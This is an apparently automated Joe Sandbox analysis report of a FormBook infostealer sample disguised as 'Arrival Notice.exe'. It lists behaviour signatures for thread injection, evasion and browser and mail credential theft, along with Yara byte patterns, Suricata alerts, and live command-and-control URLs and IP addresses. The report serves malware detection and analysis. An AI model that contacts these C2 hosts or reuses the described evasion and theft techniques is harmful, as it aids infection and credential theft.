Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arrival Notice.exe

Overview

General Information

Sample name:Arrival Notice.exe
Analysis ID:1494709
MD5:f94ffbea567a61ade8409b8a854d6562
SHA1:cd0e9b9c21111af31bb59d416e6edf49eb8aaf3e
SHA256:f0cd4c3441a54c8b9f0d7aa5ba5066014d8eaefe9ddf6b87906354e043b627b5
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Arrival Notice.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: F94FFBEA567A61ADE8409B8A854D6562)
    • svchost.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Arrival Notice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • IprrrFQGqOjAyLqOuuogohDyaEetb.exe (PID: 1516 cmdline: "C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 7092 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • IprrrFQGqOjAyLqOuuogohDyaEetb.exe (PID: 4544 cmdline: "C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1700 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.exe, ParentProcessId: 6980, ParentProcessName: Arrival Notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ProcessId: 7084, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ParentImage: C:\Users\user\Desktop\Arrival Notice.exe, ParentProcessId: 6980, ParentProcessName: Arrival Notice.exe, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice.exe", ProcessId: 7084, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-19T04:29:45.770188+0200
            SID:2855464
            Severity:1
            Source Port:61909
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:15.619235+0200
            SID:2855464
            Severity:1
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:26:45.953305+0200
            SID:2855464
            Severity:1
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:43.220807+0200
            SID:2855464
            Severity:1
            Source Port:61908
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:59.083931+0200
            SID:2050745
            Severity:1
            Source Port:61898
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:25:50.548648+0200
            SID:2050745
            Severity:1
            Source Port:61910
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:26:51.139925+0200
            SID:2855464
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:08.800729+0200
            SID:2855464
            Severity:1
            Source Port:61889
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:26:30.209134+0200
            SID:2050745
            Severity:1
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:28:45.803748+0200
            SID:2050745
            Severity:1
            Source Port:61894
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:28:03.640634+0200
            SID:2855464
            Severity:1
            Source Port:61887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:18.166411+0200
            SID:2855464
            Severity:1
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:23.394049+0200
            SID:2855464
            Severity:1
            Source Port:61893
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:18.369749+0200
            SID:2855464
            Severity:1
            Source Port:61903
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:26:48.524707+0200
            SID:2855464
            Severity:1
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:26.074038+0200
            SID:2050745
            Severity:1
            Source Port:61906
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:29:12.619341+0200
            SID:2050745
            Severity:1
            Source Port:61902
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:26:53.621214+0200
            SID:2050745
            Severity:1
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:28:20.846261+0200
            SID:2855464
            Severity:1
            Source Port:61892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:56.555569+0200
            SID:2855464
            Severity:1
            Source Port:61897
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:06.168191+0200
            SID:2855464
            Severity:1
            Source Port:61888
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:53.995546+0200
            SID:2855464
            Severity:1
            Source Port:61896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:46.320412+0200
            SID:2855464
            Severity:1
            Source Port:61885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:11.205183+0200
            SID:2050745
            Severity:1
            Source Port:61890
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:29:23.565167+0200
            SID:2855464
            Severity:1
            Source Port:61905
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:40.691998+0200
            SID:2855464
            Severity:1
            Source Port:61907
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:41.892608+0200
            SID:2855464
            Severity:1
            Source Port:61883
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:51.482298+0200
            SID:2855464
            Severity:1
            Source Port:61895
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:20.693670+0200
            SID:2855464
            Severity:1
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:24.986327+0200
            SID:2050745
            Severity:1
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:27:57.855403+0200
            SID:2050745
            Severity:1
            Source Port:61886
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-19T04:29:07.504399+0200
            SID:2855464
            Severity:1
            Source Port:61900
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:10.035756+0200
            SID:2855464
            Severity:1
            Source Port:61901
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:27:44.424571+0200
            SID:2855464
            Severity:1
            Source Port:61884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:04.930341+0200
            SID:2855464
            Severity:1
            Source Port:61899
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:28:18.314367+0200
            SID:2855464
            Severity:1
            Source Port:61891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-19T04:29:20.919756+0200
            SID:2855464
            Severity:1
            Source Port:61904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.sandranoll.com/aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=Avira URL Cloud: Label: malware
            Source: http://www.sandranoll.com/aroo/Avira URL Cloud: Label: malware
            Source: http://www.gipsytroya.com/tf44/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.gipsytroya.com/tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: www.sandranoll.comVirustotal: Detection: 10%Perma Link
            Source: www.anuts.topVirustotal: Detection: 7%Perma Link
            Source: http://www.gipsytroya.com/tf44/Virustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Arrival Notice.exeReversingLabs: Detection: 36%
            Source: Arrival Notice.exeVirustotal: Detection: 27%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Arrival Notice.exeJoe Sandbox ML: detected
            Source: Arrival Notice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1783713149.000000000098E000.00000002.00000001.01000000.00000004.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4134616336.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0041DBBE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004268EE FindFirstFileW,FindClose,0_2_004268EE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0042698F
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0041D076
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0041D3A9
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00429642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00429642
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0042979D
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00429B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00429B2B
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00425C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00425C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F8BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_02F8BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax3_2_02F79870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h3_2_04F0053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61884 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61895 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61883 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61888 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61893 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61900 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61891 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 5.44.111.162:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61886 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61887 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61890 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61902 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61906 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61901 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61896 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61892 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61894 -> 23.251.54.212:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61899 -> 213.145.228.16:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61885 -> 43.252.167.188:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61904 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.160.0.106:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61898 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61897 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61907 -> 104.21.45.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61908 -> 104.21.45.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61903 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61905 -> 91.195.240.19:80
